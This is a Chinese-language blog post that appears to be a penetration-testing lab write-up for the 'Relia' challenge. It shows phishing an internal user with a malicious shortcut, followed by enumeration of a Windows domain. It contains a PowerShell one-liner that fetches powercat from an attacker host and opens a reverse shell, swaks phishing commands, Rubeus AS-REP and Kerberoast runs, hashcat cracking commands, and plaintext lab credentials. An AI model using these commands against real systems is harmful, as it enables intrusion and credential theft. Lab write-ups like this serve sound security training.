Challenge 2 - Relia(6)

 Challenge 2 - Relia(6)

下一台目標室內網的 .14 機器,不過攻擊的契機是上一章拿到的郵件帳號與密碼

所以攻擊的方式是透過外網的 .189 寄信給 jim@relia.com



之前有掃過外網的 .189 Rustscan 如下,可以看到有開啟 25 Port



snmp 是沒有開的



可以看到 25 Port 是 hMailServer smtpd



先建立一個 Shortcut 內容為 Reverse Shell,powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.201/tools/powercat.ps1');powercat -c 192.168.45.201 -p 4444 -e powershell"



同 LAB 練習,參考 : https://your-it-note.blogspot.com/2023/08/windows-library-file.html

一樣取名 "automatic_configuration"



測試看來沒有問題,短連結是透過 LAB2 準備的 WINPREP 機器建立



寄件者號密碼 maildmz@relia.com:DPuBT9tGCBrTbR,確認有效的驗證



直接將短連結 Shortcut 寄給 jim@relia.com 看看,sudo swaks -t jim@relia.com --from maildmz@relia.com --attach @automatic_configuration.lnk --server 192.168.155.189 --body @/home/kali/lab2/14/body.txt --header "Subject: automatic_configuration Script" --suppress-data -ap



等了一段時間都沒有 Reverse Shell 進來,看來不能直接寄短連結

那就一樣先建立 WebDAV Server ,/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

將短連結放在 WebDAV 伺服器目錄



裡面記得要再放 /tools/powercat.ps1




建立 WebDAV 連線檔案



再寄一次,sudo swaks -t jim@relia.com --from maildmz@relia.com --attach @aries.Library-ms --server 192.168.155.189 --body @/home/kali/lab2/14/body.txt --header "Subject: automatic_configuration Script" --suppress-data -ap

可以看到來連線也有抓 powercat.ps1



4444 Listener 進來了,whoami 確認是 jim,IP 是內網的 172.16.xxx.14,順手拿 local.txt flag



systeminfo 可以看到這一台有加入 (relia.com) 網域



net user /domain 將網域帳號列舉出來



Get-LocalGroupMember administrators,現有使用者不是管理者但有看到 offsec 是管理者



whoami /priv 沒有啥可利用的權限



執行 .\Rubeus.exe asreproast /nowrap 查找 AS-REP,發現 michelle 帳號



hashcat 破解看看,└─$ hashcat -m 18200 michelle.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force,破解得到密碼 "NotMyPassword0k?"



馬上測試看看,└─$ crackmapexec smb 192.168.155.189 -u michelle -p 'NotMyPassword0k?'

又獲得一組有效的驗證



改查詢 Kerberoasting,.\rubeus.exe kerberoast /outfile:hashes.kerberoast

發現 iis_service 帳號的 HASH



破解看看,└─$ hashcat -m 13100 iis_service.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force,破解不了



查找相關 *.ini、*.txt 檔案時發現 proof.txt 放在 offsec 的桌面且可以直接讀到


更新攻擊順序表如下



繼續枚舉發現 jim 的資料夾中有一個 *.kdbx,透過 chisel 將檔案抓回來



破解密碼得到 "mercedes1"



獲得兩組帳號密碼 dmzadmin:SlimGodhoodMope、jim@relia.com:Castello1!



dmzadmin:SlimGodhoodMope 測試後是外網 .191 的本機帳號驗證



驗證網域帳號 jim 的密碼,確認現有帳號密碼驗證是 jim@relia.com:Castello1!



更新帳號密碼表




後續跑了 winPEASx64.exe 以及繼續枚舉逛機器都沒有發現額外有用的資訊

也沒有提權成功,但至此終於打入內網且拿到了一組有用的資訊網域資訊

一樣有跑了 BloodHound 不過暫時沒有甚麼用所以先不寫

將網域這一段 BloodHound 放到下個章節來講,原因看到下一章就知道了



留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)